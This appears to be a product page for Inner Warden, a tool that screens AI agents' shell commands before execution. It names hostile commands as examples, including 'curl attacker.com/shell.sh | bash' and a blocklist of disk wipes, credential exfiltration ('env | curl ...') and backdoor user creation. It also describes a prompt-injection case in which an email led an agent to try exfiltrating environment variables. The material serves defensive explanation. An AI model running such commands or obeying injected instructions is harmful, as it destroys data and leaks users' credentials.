How to Protect AI Agents Running on Your Server
AI agents are running commands on servers everywhere. n8n workflows execute shell scripts. OpenClaw agents provision infrastructure. Custom LLM agents process data pipelines. They are powerful, productive, and dangerous, because every command an agent runs has the same permissions as the user running the agent.
What happens when an AI agent hallucinates rm -rf /? Or when a prompt injection tricks it into running curl attacker.com/shell.sh | bash? Without a validation layer, the command executes with full privileges. Inner Warden provides that validation layer.
Why AI agents need a safety net
AI agents are non-deterministic by nature. The same prompt can produce different commands on different runs. This is fine for text generation. It is catastrophic for system administration. The risks include:
- Hallucinated commands - the model generates a command that looks plausible but is destructive. It "remembers" a path that does not exist or a flag that does something different from what it thinks.
- Prompt injection - an attacker embeds instructions in data the agent processes (a filename, a web page, a database field). The agent follows the injected instructions.
- Scope creep - the agent is asked to "clean up disk space" and decides to delete log files, backups, or data directories.
- Credential exposure - the agent prints environment variables, API keys, or database connection strings in its output or logs.
How the check-command API works
Inner Warden exposes a local API that AI agents call before executing any command. The agent sends the proposed command, Inner Warden scores the risk, and returns an allow/deny decision. The flow:
The AI agent sends the command string to Inner Warden's local API endpoint before executing it.
The command is checked against a blocklist (destructive operations), an allowlist (safe operations), and optionally scored by AI for context-aware risk assessment.
The API returns: allow (safe to execute), deny (blocked), or review (requires human approval via Telegram).
Every command check is logged in the JSONL audit trail: what was proposed, what was decided, and why.
What gets blocked
Inner Warden blocks commands that are destructive, exfiltrative, or escalatory. Examples:
rm -rf /Filesystem destructioncurl ... | bashRemote code executionchmod 777 /etc/shadowCredential exposureuseradd backdoorUnauthorized user creationiptables -FFirewall rule flushdd if=/dev/zero of=/dev/sdaDisk wipeenv | curl ...Credential exfiltrationThe blocklist is extensible. You can add custom patterns specific to your environment (e.g., block any command that touches your production database).
Real example
An n8n workflow processing customer data was compromised via prompt injection in a customer email. The injected instructions told the agent to exfiltrate environment variables:
Without the check-command API, the environment variables (including database credentials and API keys) would have been sent to the attacker's server. Inner Warden blocked it and alerted the operator.
Set it up
Install Inner Warden and enable the AI agent protection capability:
curl -fsSL https://innerwarden.com/install | sudo bashinnerwarden enable openclaw-protectionThe check-command API is available at localhost only. It is not exposed to the network. Point your AI agent's command execution to call this API before running any shell command.
What to do next
- AI isolation model - understand the principles behind Inner Warden's approach to AI safety.
- Sudo abuse monitoring - if an AI agent has sudo access, monitor for privilege escalation patterns.
- AI agents overview - learn about all AI provider integrations and how confidence scoring works.